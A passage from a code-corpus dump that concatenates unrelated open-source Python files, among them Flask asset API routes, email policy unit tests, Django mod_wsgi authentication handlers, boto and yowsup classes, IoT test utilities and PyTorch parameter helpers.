# scope_required preserve __name__ via functools.wraps — TODO confirm.
@api.route('/remote_resources/<int:asset_id>', methods=['GET'])
@auth.login_required
@scope_required(u'asset_manager')
def get_remote_resources_by_asset_id(asset_id):
    """ Get all remote resources for an asset using the asset id. """
    try:
        remote_resources = _get_remote_resources_by_asset_id(asset_id)
        result = jsonify({'remote_resources': remote_resources})
        return result
    except Exception as err:
        message = str(err)
        current_app.logger.info(message)
        return bad_request(message)
# Get the remote resources for an asset using asset uid.
# NOTE(review): @api.route moved to the top — decorators apply bottom-up, and
# with the route listed last Flask registered the unwrapped view, bypassing
# the auth/scope checks below.
@api.route('/remote_resources/<string:asset_uid>', methods=['GET'])
@auth.login_required
@scope_required(u'asset_manager')
def get_remote_resources_by_asset_uid(asset_uid):
    """ Get all remote resources for an asset using the asset uid. """
    try:
        remote_resources = _get_remote_resources_by_asset_uid(asset_uid)
        result = jsonify({'remote_resources': remote_resources})
        return result
    except Exception as err:
        message = str(err)
        current_app.logger.info(message)
        return bad_request(message)
# Get a remote resource by remote resource id.
# NOTE(review): @api.route moved to the top — decorators apply bottom-up, and
# with the route listed last Flask registered the unwrapped view, bypassing
# the auth/scope checks below.
@api.route('/remote_resource/<int:resource_id>', methods=['GET'])
@auth.login_required
@scope_required(u'asset_manager')
def get_remote_resource_by_resource_id(resource_id):
    """ Get a remote resource by its remoteResourceId. """
    try:
        remote_resource = _get_remote_resource_by_resource_id(resource_id)
        return jsonify({'remote_resource': remote_resource})
    except Exception as err:
        message = str(err)
        current_app.logger.info(message)
        return bad_request(message)
# Create a remote resource for an asset.
# NOTE(review): @api.route moved to the top — decorators apply bottom-up, and
# with the route listed last Flask registered the unwrapped view, bypassing
# the auth/scope checks below.
@api.route('/remote_resource/<string:asset_uid>', methods=['POST'])
@auth.login_required
@scope_required(u'asset_manager')
def create_remote_resource(asset_uid):
    """ Create a new remote resource for an asset. """
    try:
        if not request.data:
            message = 'No data provided to create a remote resource.'
            raise Exception(message)
        data = json.loads(request.data)
        remote_resource = _create_remote_resource(asset_uid, data)
        if not remote_resource:
            message = 'Failed to create remote resource for asset.'
            return conflict(message)
        # 201 Created for a successful POST.
        return jsonify({'remote_resource': remote_resource}), 201
    except Exception as err:
        message = str(err)
        current_app.logger.info(message)
        return bad_request(message)
# Update a remote resource by asset uid.
# NOTE(review): @api.route moved to the top — decorators apply bottom-up, and
# with the route listed last Flask registered the unwrapped view, bypassing
# the auth/scope checks below.
@api.route('/remote_resource/<string:asset_uid>', methods=['PUT'])
@auth.login_required
@scope_required(u'asset_manager')
def update_remote_resource(asset_uid):
    """ Update a remote resource for an asset. """
    try:
        if not request.data:
            message = 'No data provided to update a remote resource.'
            raise Exception(message)
        data = json.loads(request.data)
        remote_resource = _update_remote_resource(asset_uid, data)
        if not remote_resource:
            # Fixed message typo: previously read 'Unable to get update ...'.
            message = 'Unable to update remote resource for asset uid \'%s\'.' % asset_uid
            return conflict(message)
        return jsonify({'remote_resource': remote_resource})
    except Exception as err:
        message = str(err)
        current_app.logger.info(message)
        return bad_request(message)
Mozhuowen/brython | www/src/Lib/test/test_email/test_policy.py | 34 | 13040 | import io
import types
import textwrap
import unittest
import email.policy
import email.parser
import email.generator
from email import headerregistry
def make_defaults(base_defaults, differences):
    """Return a copy of *base_defaults* overlaid with *differences*."""
    merged = dict(base_defaults)
    merged.update(differences)
    return merged
class PolicyAPITests(unittest.TestCase):
    """Exercise the public API of email.policy objects: documented defaults,
    immutability, cloning, addition, defect handling, and header factories."""

    # Show the standard failure message in addition to any custom msg.
    longMessage = True

    # Base default values.
    compat32_defaults = {
        'max_line_length': 78,
        'linesep': '\n',
        'cte_type': '8bit',
        'raise_on_defect': False,
    }
    # These default values are the ones set on email.policy.default.
    # If any of these defaults change, the docs must be updated.
    policy_defaults = compat32_defaults.copy()
    policy_defaults.update({
        'raise_on_defect': False,
        'header_factory': email.policy.EmailPolicy.header_factory,
        'refold_source': 'long',
    })

    # For each policy under test, we give here what we expect the defaults to
    # be for that policy. The second argument to make defaults is the
    # difference between the base defaults and that for the particular policy.
    new_policy = email.policy.EmailPolicy()
    policies = {
        email.policy.compat32: make_defaults(compat32_defaults, {}),
        email.policy.default: make_defaults(policy_defaults, {}),
        email.policy.SMTP: make_defaults(policy_defaults,
                                         {'linesep': '\r\n'}),
        email.policy.HTTP: make_defaults(policy_defaults,
                                         {'linesep': '\r\n',
                                          'max_line_length': None}),
        email.policy.strict: make_defaults(policy_defaults,
                                           {'raise_on_defect': True}),
        new_policy: make_defaults(policy_defaults, {}),
    }
    # Creating a new policy creates a new header factory. There is a test
    # later that proves this.
    policies[new_policy]['header_factory'] = new_policy.header_factory

    def test_defaults(self):
        # Every policy must expose exactly the defaults tabulated above.
        for policy, expected in self.policies.items():
            for attr, value in expected.items():
                self.assertEqual(getattr(policy, attr), value,
                                 ("change {} docs/docstrings if defaults have "
                                  "changed").format(policy))

    def test_all_attributes_covered(self):
        # Any public non-method attribute must appear in the expected-defaults
        # table, so new policy knobs can't slip in untested.
        for policy, expected in self.policies.items():
            for attr in dir(policy):
                if (attr.startswith('_') or
                        isinstance(getattr(email.policy.EmailPolicy, attr),
                                   types.FunctionType)):
                    continue
                else:
                    self.assertIn(attr, expected,
                                  "{} is not fully tested".format(attr))

    def test_abc(self):
        # Policy is abstract; instantiation must name every abstract method.
        with self.assertRaises(TypeError) as cm:
            email.policy.Policy()
        msg = str(cm.exception)
        abstract_methods = ('fold',
                            'fold_binary',
                            'header_fetch_parse',
                            'header_source_parse',
                            'header_store_parse')
        for method in abstract_methods:
            self.assertIn(method, msg)

    def test_policy_is_immutable(self):
        for policy, defaults in self.policies.items():
            for attr in defaults:
                with self.assertRaisesRegex(AttributeError, attr+".*read-only"):
                    setattr(policy, attr, None)
            with self.assertRaisesRegex(AttributeError, 'no attribute.*foo'):
                policy.foo = None

    def test_set_policy_attrs_when_cloned(self):
        # None of the attributes has a default value of None, so we set them
        # all to None in the clone call and check that it worked.
        for policyclass, defaults in self.policies.items():
            testattrdict = {attr: None for attr in defaults}
            policy = policyclass.clone(**testattrdict)
            for attr in defaults:
                self.assertIsNone(getattr(policy, attr))

    def test_reject_non_policy_keyword_when_called(self):
        for policyclass in self.policies:
            with self.assertRaises(TypeError):
                policyclass(this_keyword_should_not_be_valid=None)
            with self.assertRaises(TypeError):
                # Deliberate near-miss misspelling; must still be rejected.
                policyclass(newtline=None)

    def test_policy_addition(self):
        # policy1 + policy2 overlays policy2's explicit settings on policy1.
        expected = self.policy_defaults.copy()
        p1 = email.policy.default.clone(max_line_length=100)
        p2 = email.policy.default.clone(max_line_length=50)
        added = p1 + p2
        expected.update(max_line_length=50)
        for attr, value in expected.items():
            self.assertEqual(getattr(added, attr), value)
        added = p2 + p1
        expected.update(max_line_length=100)
        for attr, value in expected.items():
            self.assertEqual(getattr(added, attr), value)
        added = added + email.policy.default
        for attr, value in expected.items():
            self.assertEqual(getattr(added, attr), value)

    def test_register_defect(self):
        class Dummy:
            def __init__(self):
                self.defects = []
        obj = Dummy()
        defect = object()
        policy = email.policy.EmailPolicy()
        policy.register_defect(obj, defect)
        self.assertEqual(obj.defects, [defect])
        defect2 = object()
        policy.register_defect(obj, defect2)
        self.assertEqual(obj.defects, [defect, defect2])

    # Helpers shared by the handle_defect tests below.
    class MyObj:
        def __init__(self):
            self.defects = []

    class MyDefect(Exception):
        pass

    def test_handle_defect_raises_on_strict(self):
        foo = self.MyObj()
        defect = self.MyDefect("the telly is broken")
        with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
            email.policy.strict.handle_defect(foo, defect)

    def test_handle_defect_registers_defect(self):
        foo = self.MyObj()
        defect1 = self.MyDefect("one")
        email.policy.default.handle_defect(foo, defect1)
        self.assertEqual(foo.defects, [defect1])
        defect2 = self.MyDefect("two")
        email.policy.default.handle_defect(foo, defect2)
        self.assertEqual(foo.defects, [defect1, defect2])

    # Policy subclass that records defects on itself instead of on the object.
    class MyPolicy(email.policy.EmailPolicy):
        defects = None
        def __init__(self, *args, **kw):
            super().__init__(*args, defects=[], **kw)
        def register_defect(self, obj, defect):
            self.defects.append(defect)

    def test_overridden_register_defect_still_raises(self):
        foo = self.MyObj()
        defect = self.MyDefect("the telly is broken")
        with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
            self.MyPolicy(raise_on_defect=True).handle_defect(foo, defect)

    # NOTE(review): method name misspells "overridden"; kept as-is since this
    # is only a doc pass.
    def test_overriden_register_defect_works(self):
        foo = self.MyObj()
        defect1 = self.MyDefect("one")
        my_policy = self.MyPolicy()
        my_policy.handle_defect(foo, defect1)
        self.assertEqual(my_policy.defects, [defect1])
        self.assertEqual(foo.defects, [])
        defect2 = self.MyDefect("two")
        my_policy.handle_defect(foo, defect2)
        self.assertEqual(my_policy.defects, [defect1, defect2])
        self.assertEqual(foo.defects, [])

    def test_default_header_factory(self):
        h = email.policy.default.header_factory('Test', 'test')
        self.assertEqual(h.name, 'Test')
        self.assertIsInstance(h, headerregistry.UnstructuredHeader)
        self.assertIsInstance(h, headerregistry.BaseHeader)

    # Custom header type used to prove factories are per-policy.
    class Foo:
        parse = headerregistry.UnstructuredHeader.parse

    def test_each_Policy_gets_unique_factory(self):
        policy1 = email.policy.EmailPolicy()
        policy2 = email.policy.EmailPolicy()
        policy1.header_factory.map_to_type('foo', self.Foo)
        h = policy1.header_factory('foo', 'test')
        self.assertIsInstance(h, self.Foo)
        self.assertNotIsInstance(h, headerregistry.UnstructuredHeader)
        h = policy2.header_factory('foo', 'test')
        self.assertNotIsInstance(h, self.Foo)
        self.assertIsInstance(h, headerregistry.UnstructuredHeader)

    def test_clone_copies_factory(self):
        # A clone shares (not copies) the factory, so registrations propagate.
        policy1 = email.policy.EmailPolicy()
        policy2 = policy1.clone()
        policy1.header_factory.map_to_type('foo', self.Foo)
        h = policy1.header_factory('foo', 'test')
        self.assertIsInstance(h, self.Foo)
        h = policy2.header_factory('foo', 'test')
        self.assertIsInstance(h, self.Foo)

    def test_new_factory_overrides_default(self):
        mypolicy = email.policy.EmailPolicy()
        myfactory = mypolicy.header_factory
        newpolicy = mypolicy + email.policy.strict
        self.assertEqual(newpolicy.header_factory, myfactory)
        newpolicy = email.policy.strict + mypolicy
        self.assertEqual(newpolicy.header_factory, myfactory)

    def test_adding_default_policies_preserves_default_factory(self):
        newpolicy = email.policy.default + email.policy.strict
        self.assertEqual(newpolicy.header_factory,
                         email.policy.EmailPolicy.header_factory)
        self.assertEqual(newpolicy.__dict__, {'raise_on_defect': True})
# XXX: Need subclassing tests.
# For adding subclassed objects, make sure the usual rules apply (subclass
# wins), but that the order still works (right overrides left).
class TestPolicyPropagation(unittest.TestCase):
    """Verify that a policy passed to any parsing entry point reaches feedparser."""

    # The abstract methods are used by the parser but not by the wrapper
    # functions that call it, so if the exception gets raised we know that the
    # policy was actually propagated all the way to feedparser.
    class MyPolicy(email.policy.Policy):
        def badmethod(self, *args, **kw):
            raise Exception("test")
        # NOTE(review): the abstract method is named ``header_fetch_parse``;
        # ``header_fetch_parser`` here looks like a typo and creates an extra
        # attribute rather than overriding anything — TODO confirm against
        # email.policy.Policy.
        fold = fold_binary = header_fetch_parser = badmethod
        header_source_parse = header_store_parse = badmethod

    def test_message_from_string(self):
        with self.assertRaisesRegex(Exception, "^test$"):
            email.message_from_string("Subject: test\n\n",
                                      policy=self.MyPolicy)

    def test_message_from_bytes(self):
        with self.assertRaisesRegex(Exception, "^test$"):
            email.message_from_bytes(b"Subject: test\n\n",
                                     policy=self.MyPolicy)

    def test_message_from_file(self):
        f = io.StringIO('Subject: test\n\n')
        with self.assertRaisesRegex(Exception, "^test$"):
            email.message_from_file(f, policy=self.MyPolicy)

    def test_message_from_binary_file(self):
        f = io.BytesIO(b'Subject: test\n\n')
        with self.assertRaisesRegex(Exception, "^test$"):
            email.message_from_binary_file(f, policy=self.MyPolicy)

    # These are redundant, but we need them for black-box completeness.

    def test_parser(self):
        p = email.parser.Parser(policy=self.MyPolicy)
        with self.assertRaisesRegex(Exception, "^test$"):
            p.parsestr('Subject: test\n\n')

    def test_bytes_parser(self):
        p = email.parser.BytesParser(policy=self.MyPolicy)
        with self.assertRaisesRegex(Exception, "^test$"):
            p.parsebytes(b'Subject: test\n\n')

    # Now that we've established that all the parse methods get the
    # policy in to feedparser, we can use message_from_string for
    # the rest of the propagation tests.

    def _make_msg(self, source='Subject: test\n\n', policy=None):
        # Remember the policy used so tests can assert identity against it.
        self.policy = email.policy.default.clone() if policy is None else policy
        return email.message_from_string(source, policy=self.policy)

    def test_parser_propagates_policy_to_message(self):
        msg = self._make_msg()
        self.assertIs(msg.policy, self.policy)

    def test_parser_propagates_policy_to_sub_messages(self):
        msg = self._make_msg(textwrap.dedent("""\
            Subject: mime test
            MIME-Version: 1.0
            Content-Type: multipart/mixed, boundary="XXX"

            --XXX
            Content-Type: text/plain

            test
            --XXX
            Content-Type: text/plain

            test2
            --XXX--
            """))
        for part in msg.walk():
            self.assertIs(part.policy, self.policy)

    def test_message_policy_propagates_to_generator(self):
        # linesep='X' makes the policy's effect visible in the flattened text.
        msg = self._make_msg("Subject: test\nTo: foo\n\n",
                             policy=email.policy.default.clone(linesep='X'))
        s = io.StringIO()
        g = email.generator.Generator(s)
        g.flatten(msg)
        self.assertEqual(s.getvalue(), "Subject: testXTo: fooXX")

    def test_message_policy_used_by_as_string(self):
        msg = self._make_msg("Subject: test\nTo: foo\n\n",
                             policy=email.policy.default.clone(linesep='X'))
        self.assertEqual(msg.as_string(), "Subject: testXTo: fooXX")
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| bsd-3-clause |
js0701/chromium-crosswalk | tools/telemetry/third_party/webpagereplay/third_party/dns/__init__.py | 215 | 1293 | # Copyright (C) 2003-2007, 2009 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""dnspython DNS toolkit"""
# Public submodules of the dns package, as exported by ``from dns import *``.
__all__ = [
    'dnssec',
    'e164',
    'edns',
    'entropy',
    'exception',
    'flags',
    'inet',
    'ipv4',
    'ipv6',
    'message',
    'name',
    'namedict',
    'node',
    'opcode',
    'query',
    'rcode',
    'rdata',
    'rdataclass',
    'rdataset',
    'rdatatype',
    'renderer',
    'resolver',
    'reversename',
    'rrset',
    'set',
    'tokenizer',
    'tsig',
    'tsigkeyring',
    'ttl',
    'rdtypes',
    'update',
    'version',
    'zone',
]
| bsd-3-clause |
RossBrunton/django | django/contrib/auth/handlers/modwsgi.py | 537 | 1344 | from django import db
from django.contrib import auth
from django.utils.encoding import force_bytes
def check_password(environ, username, password):
    """
    Authenticates against Django's auth database.

    mod_wsgi docs specify None, True, False as return value depending
    on whether the user exists and authenticates.
    """
    UserModel = auth.get_user_model()
    # Connection state is managed the same way the WSGI handler does it,
    # because mod_wsgi may invoke this outside a request/response cycle.
    db.reset_queries()
    try:
        try:
            candidate = UserModel._default_manager.get_by_natural_key(username)
        except UserModel.DoesNotExist:
            return None
        return candidate.check_password(password) if candidate.is_active else None
    finally:
        db.close_old_connections()
def groups_for_user(environ, username):
    """
    Authorizes a user based on groups.
    """
    UserModel = auth.get_user_model()
    # Connection state is managed the same way the WSGI handler does it,
    # because mod_wsgi may invoke this outside a request/response cycle.
    db.reset_queries()
    try:
        account = None
        try:
            account = UserModel._default_manager.get_by_natural_key(username)
        except UserModel.DoesNotExist:
            pass
        if account is None or not account.is_active:
            return []
        return [force_bytes(group.name) for group in account.groups.all()]
    finally:
        db.close_old_connections()
| bsd-3-clause |
yangchaogit/boto | boto/ec2/autoscale/tag.py | 173 | 3379 | # Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Tag(object):
    """
    A name/value tag on an AutoScalingGroup resource.

    :ivar key: The key of the tag.
    :ivar value: The value of the tag.
    :ivar propagate_at_launch: Boolean value which specifies whether the
        new tag will be applied to instances launched after the tag is
        created.
    :ivar resource_id: The name of the autoscaling group.
    :ivar resource_type: The only supported resource type at this time
        is "auto-scaling-group".
    """

    def __init__(self, connection=None, key=None, value=None,
                 propagate_at_launch=False, resource_id=None,
                 resource_type='auto-scaling-group'):
        self.connection = connection
        self.key = key
        self.value = value
        self.propagate_at_launch = propagate_at_launch
        self.resource_id = resource_id
        self.resource_type = resource_type

    def __repr__(self):
        return 'Tag(%s=%s)' % (self.key, self.value)

    def startElement(self, name, attrs, connection):
        # Tags carry no nested XML structure of interest.
        pass

    def endElement(self, name, value, connection):
        # Map each closing XML element onto the corresponding attribute.
        if name == 'Key':
            self.key = value
        elif name == 'Value':
            self.value = value
        elif name == 'PropagateAtLaunch':
            self.propagate_at_launch = value.lower() == 'true'
        elif name == 'ResourceId':
            self.resource_id = value
        elif name == 'ResourceType':
            self.resource_type = value

    def build_params(self, params, i):
        """
        Populates a dictionary with the name/value pairs necessary
        to identify this Tag in a request.
        """
        pairs = [
            ('ResourceId', self.resource_id),
            ('ResourceType', self.resource_type),
            ('Key', self.key),
            ('Value', self.value),
            ('PropagateAtLaunch',
             'true' if self.propagate_at_launch else 'false'),
        ]
        for suffix, val in pairs:
            params['Tags.member.%d.%s' % (i, suffix)] = val

    def delete(self):
        return self.connection.delete_tags([self])
| mit |
Juanpf/yowsup | yowsup/layers/protocol_groups/protocolentities/iq_groups_participants_add_success.py | 61 | 1785 | from yowsup.structs import ProtocolTreeNode
from yowsup.layers.protocol_iq.protocolentities import ResultIqProtocolEntity
class SuccessAddParticipantsIqProtocolEntity(ResultIqProtocolEntity):
    '''
    Result iq received after participants were successfully added to a group:

    <iq type="result" from="{{group_jid}}" id="{{id}}">
        <add type="success" participant="{{jid}}"></add>
        <add type="success" participant="{{jid}}"></add>
    </iq>
    '''
    def __init__(self, _id, groupId, participantList):
        # The group jid is carried in the iq's "from" attribute.
        super(SuccessAddParticipantsIqProtocolEntity, self).__init__(_from = groupId, _id = _id)
        self.setProps(groupId, participantList)

    def setProps(self, groupId, participantList):
        # groupId: jid of the group; participantList: jids that were added.
        self.groupId = groupId
        self.participantList = participantList
        self.action = 'add'

    def getAction(self):
        return self.action

    def toProtocolTreeNode(self):
        node = super(SuccessAddParticipantsIqProtocolEntity, self).toProtocolTreeNode()
        # One <add type="success"> child per successfully added participant.
        participantNodes = [
            ProtocolTreeNode("add", {
                "type": "success",
                "participant": participant
            })
            for participant in self.participantList
        ]
        node.addChildren(participantNodes)
        return node

    @staticmethod
    def fromProtocolTreeNode(node):
        # Two-argument super() form because this is a @staticmethod (no cls).
        entity = super(SuccessAddParticipantsIqProtocolEntity, SuccessAddParticipantsIqProtocolEntity).fromProtocolTreeNode(node)
        # Re-brand the base-class entity built by the parent parser.
        entity.__class__ = SuccessAddParticipantsIqProtocolEntity
        participantList = []
        for participantNode in node.getAllChildren():
            # Only children flagged as successful additions are collected.
            if participantNode["type"]=="success":
                participantList.append(participantNode["participant"])
        entity.setProps(node.getAttributeValue("from"), participantList)
        return entity
| gpl-3.0 |
2014c2g2/2015cda | static/Brython3.1.1-20150328-091302/Lib/_string.py | 625 | 1112 | """string helper module"""
import re
class __loader__(object):
    # Stub so the module publishes a ``__loader__`` attribute; presumably
    # mirrors what the import machinery expects of the real C ``_string``
    # module — TODO confirm against the Brython runtime.
    pass
def formatter_field_name_split(fieldname):
    """Split the argument as a field name.

    Returns ``(first, rest)`` where ``rest`` iterates over
    ``(item, is_attr)`` tuples for the remaining dotted components.
    Purely numeric components are converted to ``int`` so they can be
    used as sequence indexes.

    NOTE(review): iterating ``fieldname`` processes it element by element;
    a plain string argument would be walked character by character — TODO
    confirm callers supply an iterable of name segments.
    """
    _list = []
    for _name in fieldname:
        _parts = _name.split('.')
        for _item in _parts:
            is_attr = False  # fix me
            # str.isdecimal() accepts exactly the strings int() can parse.
            # The previous ``re.match('\\d+', _item)`` also matched digit
            # *prefixes* such as '1abc' and then crashed in int().
            if _item.isdecimal():
                _list.append((int(_item), is_attr))
            else:
                _list.append((_item, is_attr))
    return _list[0][0], iter(_list[1:])
def formatter_parser(*args, **kw):
    """Parse the argument as a format string.

    Returns a list of ``(literal_text, field_name, flags, None)`` tuples.

    NOTE(review): the '!'-based split is simplistic — a format spec such as
    '{x:>10}' ends up inside the name component; TODO confirm what the
    downstream ``str.format`` machinery expects.
    """
    assert len(args) == 1
    assert isinstance(args[0], str)
    _result = []
    for _match in re.finditer(r"([^{]*)?(\{[^}]*\})?", args[0]):
        _pre, _fmt = _match.groups()
        if _fmt is None:
            _result.append((_pre, None, None, None))
        elif _fmt == '{}':
            _result.append((_pre, '', '', None))
        else:
            _m = re.match(r"\{([^!]*)!?(.*)?\}", _fmt)
            # BUG FIX: the previous code called _m.groups(0)/_m.groups(1),
            # which return the tuple of *all* groups (the argument is only a
            # default for non-participating groups), so every parsed field
            # carried a 2-tuple instead of its name/flags strings.
            _name = _m.group(1)
            _flags = _m.group(2)
            _result.append((_pre, _name, _flags, None))
    return _result
| gpl-3.0 |
ibm-messaging/iot-python | test/testUtils/__init__.py | 2 | 2972 | # *****************************************************************************
# Copyright (c) 2018 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
# *****************************************************************************
import wiotp.sdk.application
import pytest
import os
# Marker for tests that must not run concurrently across parallel CI jobs.
# NOTE(review): the condition skips when ONE_JOB_ONLY_TESTS == "false", i.e.
# setting the variable to "false" opts *out* of these tests -- confirm that
# inversion is intentional.
oneJobOnlyTest = pytest.mark.skipif(
    os.getenv("ONE_JOB_ONLY_TESTS", "true") == "false",
    reason="Doesn't support running in multiple envs in parallel due to limits on # of service bindings allowed",
)
class AbstractTest(object):
    """Shared base for the integration tests.

    All service credentials are read from environment variables when this
    module is imported; missing mandatory Watson IoT Platform credentials
    abort the run immediately (the ``raise`` statements execute at
    class-body evaluation time).
    """

    # Watson IoT Platform credentials (mandatory).
    WIOTP_API_KEY = os.getenv("WIOTP_API_KEY")
    WIOTP_API_TOKEN = os.getenv("WIOTP_API_TOKEN")

    # Optional Cloudant binding.
    CLOUDANT_HOST = os.getenv("CLOUDANT_HOST", None)
    CLOUDANT_PORT = os.getenv("CLOUDANT_PORT", None)
    CLOUDANT_USERNAME = os.getenv("CLOUDANT_USERNAME", None)
    CLOUDANT_PASSWORD = os.getenv("CLOUDANT_PASSWORD", None)

    # Optional Event Streams (Kafka) binding.
    EVENTSTREAMS_API_KEY = os.getenv("EVENTSTREAMS_API_KEY")
    EVENTSTREAMS_ADMIN_URL = os.getenv("EVENTSTREAMS_ADMIN_URL")
    EVENTSTREAMS_BROKER1 = os.getenv("EVENTSTREAMS_BROKER1")
    EVENTSTREAMS_BROKER2 = os.getenv("EVENTSTREAMS_BROKER2")
    EVENTSTREAMS_BROKER3 = os.getenv("EVENTSTREAMS_BROKER3")
    EVENTSTREAMS_BROKER4 = os.getenv("EVENTSTREAMS_BROKER4")
    EVENTSTREAMS_BROKER5 = os.getenv("EVENTSTREAMS_BROKER5")
    EVENTSTREAMS_USER = os.getenv("EVENTSTREAMS_USER")
    EVENTSTREAMS_PASSWORD = os.getenv("EVENTSTREAMS_PASSWORD")

    # Optional DB2 binding.
    DB2_HOST = os.getenv("DB2_HOST")
    DB2_PORT = os.getenv("DB2_PORT")
    DB2_USERNAME = os.getenv("DB2_USERNAME")
    DB2_PASSWORD = os.getenv("DB2_PASSWORD")
    DB2_HTTPS_URL = os.getenv("DB2_HTTPS_URL")
    DB2_SSL_DSN = os.getenv("DB2_SSL_DSN")
    DB2_HOST = os.getenv("DB2_HOST")  # NOTE(review): duplicate of DB2_HOST above
    DB2_URI = os.getenv("DB2_URI")
    DB2_DB = os.getenv("DB2_DB")
    DB2_SSLJDCURL = os.getenv("DB2_SSLJDCURL")
    DB2_JDBCURL = os.getenv("DB2_JDBCURL")

    # Optional PostgreSQL binding.
    POSTGRES_HOSTNAME = os.getenv("POSTGRES_HOSTNAME")
    POSTGRES_PORT = os.getenv("POSTGRES_PORT")
    POSTGRES_USERNAME = os.getenv("POSTGRES_USERNAME")
    POSTGRES_PASSWORD = os.getenv("POSTGRES_PASSWORD")
    POSTGRES_CERTIFICATE = os.getenv("POSTGRES_CERTIFICATE")
    POSTGRES_DATABASE = os.getenv("POSTGRES_DATABASE")

    # Org id is the middle segment of the API key ("a-<orgid>-<suffix>").
    # The bare except keeps import working when the key is unset/malformed;
    # the explicit check below then raises a clearer error.
    try:
        ORG_ID = WIOTP_API_KEY.split("-")[1]
    except:
        ORG_ID = None

    if WIOTP_API_KEY is None:
        raise Exception("WIOTP_API_KEY environment variable is not set")
    if WIOTP_API_TOKEN is None:
        raise Exception("WIOTP_API_TOKEN environment variable is not set")
    if ORG_ID is None:
        raise Exception("Unable to set ORG_ID from WIOTP_API_KEY")

    # One shared application client for every test in the session.
    options = wiotp.sdk.application.parseEnvVars()
    # import pprint
    # pprint.pprint(options)
    appClient = wiotp.sdk.application.ApplicationClient(options)
| epl-1.0 |
thumt/THUMT | thumt/utils/convert_params.py | 1 | 3165 | # coding=utf-8
# Copyright 2017-2020 The THUMT Authors
# Modified from torch.nn.utils.convert_parameters.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
def params_to_vec(parameters):
    r"""Flatten an iterable of parameter tensors into one 1-D vector.

    Arguments:
        parameters (Iterable[Tensor]): the tensors making up a model's
            parameters; ``None`` entries are skipped.

    Returns:
        A single 1-D tensor with all parameter values concatenated in
        iteration order.
    """
    device = None
    flattened = []
    for param in parameters:
        if param is None:
            continue
        # All parameters must live on the same device.
        device = _check_param_device(param, device)
        flattened.append(param.view(-1))
    return torch.cat(flattened)
def vec_to_params(vec, parameters):
    r"""Copy a flat vector's contents back into the parameter tensors.

    Arguments:
        vec (Tensor): a single 1-D tensor holding all parameter values.
        parameters (Iterable[Tensor]): the tensors making up a model's
            parameters; ``None`` entries are skipped.

    Raises:
        TypeError: if *vec* is not a tensor or parameters span devices.
    """
    if not isinstance(vec, torch.Tensor):
        raise TypeError("expected torch.Tensor, but got: {}"
                        .format(torch.typename(vec)))
    device = None
    offset = 0  # read position within vec
    for param in parameters:
        if param is None:
            continue
        # All parameters must live on the same device.
        device = _check_param_device(param, device)
        count = param.numel()
        # Carve out the matching slice and install it as the new data.
        param.data = vec[offset:offset + count].view_as(param).data
        offset += count
def _check_param_device(param, old_param_device):
r"""This helper function is to check if the parameters are located
in the same device. Currently, the conversion between model parameters
and single vector form is not supported for multiple allocations,
e.g. parameters in different GPUs, or mixture of CPU/GPU.
Arguments:
param ([Tensor]): a Tensor of a parameter of a model
old_param_device (int): the device where the first parameter of a
model is allocated.
Returns:
old_param_device (int): report device for the first time
"""
# Meet the first parameter
if old_param_device is None:
old_param_device = param.get_device() if param.is_cuda else -1
else:
warn = False
if param.is_cuda: # Check if in same GPU
warn = (param.get_device() != old_param_device)
else: # Check if in CPU
warn = (old_param_device != -1)
if warn:
raise TypeError("Found two parameters on different devices,"
" this is currently not supported.")
return old_param_device
| bsd-3-clause |
unbornchikken/genevo-python | genevo/optimizers/population.py | 1 | 6041 | import torch
from .organization import Organization
from .dna import dna
from ..tex import tex
class Population:
    """A fixed-size population of DNA vectors stored column-wise in one tensor.

    *owner* supplies the configuration (``dna_size``, ``population_size``)
    and the two callbacks ``make_seed_dna`` and ``calculate_fitness``.
    Each DNA is one column of ``_dna_tensor``; ``_order_by`` holds the
    fitness-sorted column indices after ``sort()``.
    """

    def __init__(self, owner):
        # Duck-typed owner contract: it must provide the two callbacks.
        assert hasattr(owner, 'make_seed_dna') and callable(owner.make_seed_dna)
        assert hasattr(owner, 'calculate_fitness') and callable(owner.calculate_fitness)
        self._owner = owner
        # dna_size x population_size: one DNA per column.
        self._dna_tensor = tex.constant(0, owner.dna_size, owner.population_size)
        # Identity ordering until sort() replaces it with fitness order.
        self._order_by = torch.arange(0, owner.population_size)
        self._bodies = None
